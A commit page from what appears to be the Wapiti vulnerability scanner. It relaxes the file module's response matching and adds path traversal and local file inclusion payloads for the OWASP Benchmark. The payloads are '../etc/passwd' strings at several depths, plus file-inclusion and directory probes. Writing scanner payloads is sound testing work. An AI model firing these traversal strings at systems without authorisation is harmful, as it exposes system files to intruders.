Amelioration de module file

Ajout des payloads afin d'identifier les vulnérabilités présentes dans l'OWASP Benchmark
OussamaBeng · May 17, 2024 · 567fa3f · 567fa3f
1 parent 8ca3503
commit 567fa3f
Show file tree

Hide file tree

Showing 2 changed files with 104 additions and 1 deletion.
diff --git a/wapitiCore/attack/mod_file.py b/wapitiCore/attack/mod_file.py
@@ -198,7 +198,9 @@ async def attack(self, request: Request, response: Optional[Response] = None):
             else:
                 file_warning = None
                 for i, rule in enumerate(payload_info.rules):
-                    if rule in response.content:
+                    rules_words = rule.split()
+                    all_words_present = all(word in response.content for word in rules_words)
+                    if all_words_present:
                         found_pattern = rule
                         vulnerable_method = payload_info.messages[i]
                         inclusion_succeed = True

diff --git a/wapitiCore/data/attacks/fileHandlingPayloads.ini b/wapitiCore/data/attacks/fileHandlingPayloads.ini
@@ -413,3 +413,104 @@ messages = Possible source code disclosure
 payload = [FILE_NAME]::$DATA
 rules = <?php
 messages = Possible source code disclosure
+
+[path_travers_generic_1]
+payload = ../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[path_travers_generic_2]
+payload = ../../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[path_travers_generic_3]
+payload = ../../../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[path_travers_generic_4]
+payload = ../../../../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[path_travers_generic_5]
+payload = ../../../../../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[path_travers_generic_6]
+payload = ../../../../../../etc/passwd
+rules = etc passwd No such file or directory
+    Access to file etc passwd created file already exists
+    The beginning of file etc passwd
+messages = Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+    Possible Linux local file disclosure vulnerability
+
+[lfi_generic_1]
+payload = ../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[lfi_generic_2]
+payload = ../../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[lfi_generic_3]
+payload = ../../../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[lfi_generic_4]
+payload = ../../../../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[lfi_generic_5]
+payload = ../../../../../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[lfi_generic_6]
+payload = ../../../../../../wapiti.txt
+rules = wapiti.txt created
+    wapiti.txt ready to write
+messages = Possible local file inclusion
+    Possible local file inclusion
+
+[path_travers_directory]
+payload = ../../../../../../
+rules = is a directory
+messages = Possible Linux local file disclosure vulnerability